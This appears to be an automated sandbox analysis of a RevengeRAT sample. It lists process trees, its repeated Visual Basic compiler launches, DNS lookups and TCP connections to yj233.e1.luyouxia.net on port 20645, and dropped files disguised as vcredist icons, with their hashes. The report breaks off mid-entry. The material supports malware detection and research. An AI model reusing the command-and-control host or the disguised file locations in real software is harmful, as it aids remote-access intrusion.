PID 4412 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4368 wrote to memory of 4460 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4368 wrote to memory of 4460 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2844 wrote to memory of 1696 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2844 wrote to memory of 1696 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1532 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\System32\Conhost.exe
PID 1532 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\System32\Conhost.exe
PID 4412 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1340 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1340 wrote to memory of 4948 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4752 wrote to memory of 4080 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4752 wrote to memory of 4080 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1456 wrote to memory of 1996 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1456 wrote to memory of 1996 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4164 wrote to memory of 4620 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4164 wrote to memory of 4620 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2248 wrote to memory of 4700 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2248 wrote to memory of 4700 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 4168 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4168 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4168 wrote to memory of 1400 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4132 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4132 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 5112 wrote to memory of 2560 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 5112 wrote to memory of 2560 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4704 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4704 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cfonx6_b.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD5B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEFC6FEA92447409BA52C6AF995BF277.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vjuqjhda.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE17.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1000FDDEE19F471FAC753B9F6957FB13.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9vxa6b40.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF30.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8CAFC5AFBC040D1907EAD5AE89DE3A2.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-y9lp4ag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFBD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6367570A20AB4D0EAFB8A2E12AFA3AA4.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iqmzrt2b.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc34F0F6707CD4452FA446A2BB5542B741.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o5zaj8qi.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF622CE03E80B4583A1E934F98A9591D.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-tv4ojmr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES105.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc52E7355544C1497E83611B5748B758.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\els-cvvq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES162.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCAD5E4C644E242F4828C7A1F581E84F.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w-vdve3v.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4096DB147B10453A98917E85DB63EAF.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6sywpk7h.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc273C6A3A5576456A99FBC6AB83E3F6A.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lbxakjmm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6331EDE1F6164333905634FAD2D9E6A7.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wup2lvx9.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc39DCF8D5AE70476C9C21A71D6D52D9CB.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rn0a6lu6.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES347.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc20603B019A994E2C847E4CF5B991EE8.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ne6ziyia.cmdline"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES395.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA543F43955F54B3690886446EE283715.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tbu-g441.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBB16B9F2BA2D47D1B76FA638B94E071.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\svdnayzc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES450.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc15289FA58604460AAF3C89C8BF82BA1.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\t4i3kkmz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4ED.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc89BE6EAE55824FC1A9406FF5BDCC49C1.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mkksb62a.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB0DA717518BE4A4B8A14AF30CC623DB0.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tfizahdg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES599.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE88B964A44F94E778DB2C18F2C5DAF37.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_qi_rytt.cmdline"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc72FC0E95F2A14D40BBEAC8A11AF3508.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hhtfuq8s.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES654.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDBDE31BCB5C4B6FADE7CB1A1226D9DF.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-njozgcv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc376D6E2269534151AD512469A8E290.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 yj233.e1.luyouxia.net udp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp
CN 123.99.198.201:20645 yj233.e1.luyouxia.net tcp

Files

memory/4412-0-0x00007FFE58365000-0x00007FFE58366000-memory.dmp

memory/4412-1-0x000000001B9C0000-0x000000001BE8E000-memory.dmp

memory/4412-2-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

memory/4412-3-0x000000001B410000-0x000000001B4B6000-memory.dmp

memory/4412-4-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

memory/4412-5-0x000000001BF50000-0x000000001BFB2000-memory.dmp

memory/4412-6-0x00007FFE58365000-0x00007FFE58366000-memory.dmp

memory/4412-7-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

memory/4412-10-0x000000001D150000-0x000000001D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cfonx6_b.cmdline

MD5 a293ad07e82dcbb54c2f57551ade5bff
SHA1 d4aa6b89ce051f0c1e74c43508e3808bbe1f5e8c
SHA256 993cb0db255626146a10d11b489352545e83512e7cc3e2c398046c2ec3ef02a4
SHA512 65098ccb0ccaa5b50e6bf440acddac60f6e1f83fc0f778d0952475977fa3001670710bb9553287e56942e1c04f51288291d5da9dd6e084c08da3bb90b551d200

C:\Users\Admin\AppData\Local\Temp\cfonx6_b.0.vb

MD5 52ddcb917d664444593bbd22fc95a236
SHA1 f87a306dffbfe5520ed98f09b7edc6085ff15338
SHA256 5c55dcac794ff730b00e24d75c2f40430d90b72c9693dd42c94941753a3d657d
SHA512 60dafb21f44cbf400e6f8bc5791df9a8d497da6837fb1a453fda81b324ac6f70fb9ec0efb1e7649b9bed0dfe979016360f3bcfef543d7e9432a97b96c8b9fd35

memory/2408-17-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

C:\ProgramData\RevengeRAT\vcredist2010_x64.log-MSI_vc_red.msi.ico

MD5 c350868e60d3f85eb01b228b7e380daa
SHA1 6c9f847060e82fe45c04f8d3dab2d5a1c2f0603e
SHA256 88c55cc5489fc8d8a0c0ace6bfb397eace09fba9d96c177ef8954b3116addab7
SHA512 47555d22608e1b63fbf1aacee130d7fc26be6befaa9d1257efb7ad336373e96878da47c1e1e26902f5746165fc7020c6929a8a0b54d5ad1de54d99514cc89d85

C:\Users\Admin\AppData\Local\Temp\RESFD5B.tmp

MD5 e4b948c1dacd2e5a462d83e722baa01d
SHA1 d5f0d762bbb3d2f6aba9443a2fa1999a9c5d2cf4
SHA256 d1ae8d87b507249acf9ba3b1d22dd33820568af64477c3d35bb5a9eb79127efb
SHA512 47ea578945cc5d3210bb1dd68ad7fbfe3e374cb83e6809ded497e312cfd1dc11ee9e020a15e03d209bd5d8c21aba5f4ad0a1ae329efd2931a7c684e36c9b413f

C:\Users\Admin\AppData\Local\Temp\vbcEFC6FEA92447409BA52C6AF995BF277.TMP

MD5 7092dd0251b89b4da60443571b16fa89
SHA1 08cb42f192e0a02730edf0dfa90f08500ea05dd2
SHA256 2aa88b69c033bd712f9752eefa5624f534b915bb5dada74133d2ac0c67beebf7
SHA512 7067f485062be4fea3d52815e4dbdad50b1c53c30b5b354d64ddf4d5126788d169b90bba26dec25ecbf40e23ea59991d149e12859838e6b10028be0c86c5af7a

memory/2408-26-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vjuqjhda.cmdline

MD5 bbbb334a727989d46da96e8cd41260d8
SHA1 95e7761aad00cbf20ed9cddeba90f2ebfe2e6d24
SHA256 b011f588aece74fcd61bbe9edca12ae91c1de8942f7c90e86c684fe51f01fbd1
SHA512 2a041445632a5134015376539652d4bbf49c215f12e241c0f666e37c6d5b200a448a7c602876f40f88915d2a74a686c120ab9153f2014c1711351c110b52a05c

C:\ProgramData\RevengeRAT\vcredist2010_x64.log.ico

MD5 64f9afd2e2b7c29a2ad40db97db28c77
SHA1 d77fa89a43487273bed14ee808f66acca43ab637
SHA256 9b20a3f11914f88b94dfaa6f846a20629d560dd71a5142585a676c2ef72dc292
SHA512 7dd80a4ed4330fe77057943993a610fbd2b2aa9262f811d51f977df7fbcc07263d95c53e2fb16f2451bd77a45a1569727fbf19aeded6248d57c10f48c84cb4da

C:\Users\Admin\AppData\Local\Temp\vjuqjhda.0.vb

MD5 31e957b66c3bd99680f428f0f581e1a2
SHA1 010caae837ec64d2070e5119daef8be20c6c2eae
SHA256 3e32c4b27f7a5840edc2f39d3fc74c2863aa2dfd9a409f1f772b8f427091a751
SHA512 6e61d77c85c1bf3fd0c99630156e0390f9a477b4df0e46218054eae65bee7766443905f48e3f3c7dec72b3fb773f758cf175df54f1ed61ac266469579f3997af

C:\Users\Admin\AppData\Local\Temp\RESFE17.tmp

MD5 d27bfa10a075d62395fc6a5c93ea6a86
SHA1 f9aef98633010231c4b4e7cb5a8f225a1d14e665
SHA256 e87368c5266ab2caf0377171a97c0323426e4318b702efbd91336de131e478f0
SHA512 cf633c4f51daa712510881acd2ddf324199c6c8461d03c44e5255862a44e1f50b148797d9a545c6e572019c65024da746b5ad988db923fcc7708b96ddbc2d4f4

memory/376-41-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vbc1000FDDEE19F471FAC753B9F6957FB13.TMP

MD5 0fe8a8eff02f77e315885b53503483a8
SHA1 953a58a0ff6736967270494a986aca7b5c490824
SHA256 2d2c202dfa06961e1fad395fe08f9caa4b1004f71a0c37457581fa095229afba
SHA512 e0fbfcb9a2db833bea58e5ed923f93689ee598c76f27fb57e19d9a7f110369035f00c3d0d4f229997aeb7b3dd38a24a5a76d55f66f35040fe986f31d8f79a7af

memory/376-43-0x00007FFE580B0000-0x00007FFE58A51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9vxa6b40.cmdline

MD5 ec0a17d4fe193aec1fd14b42eb9c0ae2
SHA1 ade15872cdce3bf140af7c55c25a52ba804e454a
SHA256 c055eeeee0428292e6296c535079a7e0c7fd3800cab2f2e53ffbc88e5b8cd7a3
SHA512 e184ffa7e3c7d54046789ec76847a6d732dd2c76bbf4840f85601db878113f1e0d7864b2b369b43c4b696dbd568ae581225e0a96754c19c2d7392cc2fffdad80

C:\Users\Admin\AppData\Local\Temp\9vxa6b40.0.vb

MD5 0c699ac85a419d8ae23d9ae776c6212e
SHA1 e69bf74518004a688c55ef42a89c880ede98ea64
SHA256 a109cb0ae544700270ad4cb1e3e45f7f876b9cfac5f2216875c65235502982fe
SHA512 674e3f3c24e513d1bb7618b58871d47233af0a450f1068762e875277bbddf6c4f78245988c96e907dbbf3aafb5ff59e457528b3efa8e0a844f86a17a26d4f3d6

C:\Users\Admin\AppData\Local\Temp\RESFF30.tmp

MD5 a19719e2a42da8dd13dd1c2d2ebd1cff
SHA1 39de108f9b4422f80bde6343ebbd667f6dc87329
SHA256 55a2a1d4284c99c446b1b533f26a42a5992acc72efd4131d523783172bd1b198
SHA512 d3ee8f75a2a281a16eb5ddada1194ab84f5e0a5828bf4a68c098a2379543d36cf356ffbb524747c443a068a5a2e1bc5197b7139d4fdbd67360c9c28f574d503b

C:\Users\Admin\AppData\Local\Temp\vbc8CAFC5AFBC040D1907EAD5AE89DE3A2.TMP

MD5 bb7c2818b20789e4b46db3b54dbbbb12
